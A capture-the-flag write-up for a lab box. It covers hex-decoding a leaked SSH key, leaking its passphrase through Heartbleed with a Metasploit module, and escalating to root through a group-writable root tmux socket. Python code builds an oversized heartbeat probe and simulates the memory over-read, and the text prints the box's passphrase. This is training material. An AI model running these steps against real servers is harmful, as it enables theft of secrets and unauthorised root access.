This box has a fair number of rabbit holes, most of which I am going to skip so this write-up does not get overly long.
The first thing I always do is run an nmap scan. It found three open ports: HTTP, HTTPS and SSH. This is great, web servers are fun, so of course we head to the web server first. All it serves is one (rather stupid) picture and nothing else. Absolutely nothing...
The next thing I always do with a web server is run DirBuster and hope it turns up some directories. Luckily it did, and I was able to move over to the /dev/ directory. There were two files in it, one of them named hype_key (and yes, it turns out to be the SSH key for the user hype, so the filename hands us the username and saves us the annoyance of having to discover it). The file is a hex dump; decode it and you get a passphrase-protected SSH private key. So the key alone is not enough, we also need its passphrase.
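As an added example (not part of the original write-up), here is how I would decode a file like hype_key and check, before wasting time on ssh -i, whether the recovered key is going to ask for a passphrase. The hex dump below is a constructed sample covering only the header lines of such a key, not the real file from the box, and the function names are my own.

```python
import re

# Constructed sample: hex dump of the first header lines of a legacy (PKCS#1)
# PEM private key that OpenSSL encrypted with a passphrase. The real hype_key
# is a full dump of the same shape, with the key body following these lines.
SAMPLE_HEX_DUMP = (
    "2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a\n"
    "50 72 6f 63 2d 54 79 70 65 3a 20 34 2c 45 4e 43 52 59 50 54 45 44 0a\n"
    "44 45 4b 2d 49 6e 66 6f 3a 20 41 45 53 2d 31 32 38 2d 43 42 43 2c "
    "30 30 31 31 32 32 33 33 34 34 35 35 36 36 37 37 38 38 39 39 41 41 42 42 43 43 44 44 45 45 46 46 0a\n"
    "0a\n"
)


def decode_hex_dump(dump: str) -> bytes:
    """Turn a hex dump into raw bytes, tolerating spaces, newlines and mixed case."""
    cleaned = re.sub(r"[^0-9a-fA-F]", "", dump)
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits: the dump is truncated or not hex")
    return bytes.fromhex(cleaned)


def pem_info(pem: bytes) -> dict:
    """Report the PEM object type and whether a passphrase is needed to use it.

    Legacy OpenSSL PEM keys announce encryption with the headers
    'Proc-Type: 4,ENCRYPTED' and 'DEK-Info: <cipher>,<iv>' right after BEGIN.
    """
    text = pem.decode("ascii", errors="replace")
    begin = re.search(r"-----BEGIN ([A-Z ]+)-----", text)
    if not begin:
        raise ValueError("no PEM BEGIN marker: this is not a PEM file")
    headers = dict(re.findall(r"^([A-Za-z-]+): (.*)$", text, flags=re.MULTILINE))
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    cipher = headers.get("DEK-Info", "").split(",")[0] or None if encrypted else None
    return {"type": begin.group(1), "encrypted": encrypted, "cipher": cipher}
```

When those two headers are present, ssh -i will prompt for the passphrase, so there is no point attempting the login until you have it.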
This box required some background knowledge I would not have had without a few hints: the Heartbleed bug (CVE-2014-0160), a serious vulnerability in OpenSSL's implementation of the TLS heartbeat extension (OpenSSL 1.0.1 through 1.0.1f, fixed in 1.0.1g). A heartbeat request carries a payload plus a 16-bit field stating the payload's length; a vulnerable server trusted that field without checking it against the data that had actually arrived, and copied that many bytes from its own memory into the reply. An unauthenticated attacker can therefore read up to 64 KB of the server process's memory per request, with nothing logged, and recover whatever happens to be lying there: session cookies, credentials, even the server's private key. In other words, it lets an attacker steal exactly the information SSL/TLS is supposed to protect.
With that explained, how do you think we are going to get the passphrase for the SSH key? Open up Metasploit and get to work. This could not be easier: a quick search for "metasploit heartbleed" will show you the way (the module is auxiliary/scanner/ssl/openssl_heartbleed). I recommend setting VERBOSE to true, which prints the leaked memory so you can read the returned text more easily.
You may have to run the module a few times, since each run returns a different slice of memory; what you're looking for is anything that stands out, such as a string labelled $text followed by an encoded value. Noticing the == at the end of that value, I assumed it was base64, and after a quick decode I used the result as the passphrase for the SSH key of the user hype, and tada, user access.
The passphrase is heartbleedbelievethehype.
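To make the mechanism concrete, here is an added example of my own, not code from the write-up or from Metasploit: it builds a heartbeat record the way a Heartbleed probe does, simulates the vulnerable and the patched server-side handling against a constructed byte string standing in for the server's memory, and then pulls the $text value out of the leaked bytes the same way the steps above do by hand. The memory contents, the function names and the base64 string (which is simply the encoding of the passphrase found on this box, newline included) are all constructed for the example.

```python
import base64
import re
import struct
from typing import Optional

# TLS record content type and heartbeat message types from RFC 6520.
HEARTBEAT_CONTENT_TYPE = 0x18
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
TLS_1_1 = b"\x03\x02"
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding after the payload


def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """Build one TLS heartbeat record.

    An honest client passes claimed_len == len(payload). A Heartbleed probe sends a
    tiny payload but claims up to 0xFFFF bytes; the mismatch is the whole attack.
    """
    message = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return bytes([HEARTBEAT_CONTENT_TYPE]) + TLS_1_1 + struct.pack("!H", len(message)) + message


def _parse_record(memory: bytes, offset: int):
    """Return (record_len, hb_type, payload_len, payload_offset) for the record at offset."""
    record_len = struct.unpack("!H", memory[offset + 3:offset + 5])[0]
    hb_type, payload_len = struct.unpack("!BH", memory[offset + 5:offset + 8])
    return record_len, hb_type, payload_len, offset + 8


def vulnerable_heartbeat(memory: bytes, offset: int) -> bytes:
    """Server side before OpenSSL 1.0.1g: copies payload_len bytes starting at the
    payload, trusting the attacker's length field, so it runs past the end of the
    record into whatever else the process has in memory and echoes that back."""
    _, hb_type, payload_len, start = _parse_record(memory, offset)
    if hb_type != HB_REQUEST:
        return b""
    echoed = memory[start:start + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def fixed_heartbeat(memory: bytes, offset: int) -> bytes:
    """Server side from 1.0.1g on: silently discard the message when type, length,
    claimed payload and minimum padding add up to more than the record delivered."""
    record_len, hb_type, payload_len, start = _parse_record(memory, offset)
    if hb_type != HB_REQUEST or 1 + 2 + payload_len + MIN_PADDING > record_len:
        return b""
    echoed = memory[start:start + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def extract_text_secret(leak: bytes) -> Optional[str]:
    """Find a '$text=<base64>' string in leaked memory and decode it, as done by hand above."""
    m = re.search(rb"\$text=([A-Za-z0-9+/]+={0,2})", leak)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode().strip()


# Constructed stand-in for the TLS server's heap: our probe record, followed by
# leftovers from earlier requests, which is what the over-read echoes back.
PROBE = build_heartbeat_request(b"\x01", claimed_len=0x4000)
LEFTOVER_MEMORY = (
    b"GET /dev/ HTTP/1.1\r\nHost: target.invalid\r\n\r\n"
    + b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==;"
    + b"\x00" * 64
)
PROCESS_MEMORY = PROBE + LEFTOVER_MEMORY
```

Note what the fix changed: nothing about the copy itself, only a bounds check that drops any heartbeat whose claimed length does not fit the record that arrived. That is why a patched server gives the probe no reply at all while a well-formed heartbeat is still echoed normally.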
Now that you are on the system it is time to get root (obviously grab the user flag as well). Skipping all the BS, what we are going to use here is a tmux session socket left behind by root. Do a "cd /" and then an "ls -la" and you will see a .dev directory owned by root but with group access for hype. Inside it is a dev_sess file, which is a tmux socket rather than a config file, so from inside /.dev run "tmux -S dev_sess": that connects you to the root-owned tmux server and the shell you land in runs as root. The lesson is that a tmux server running as root, with a socket another user's group can write to, is a free root shell for that user. CoNgRaTs u HaX0r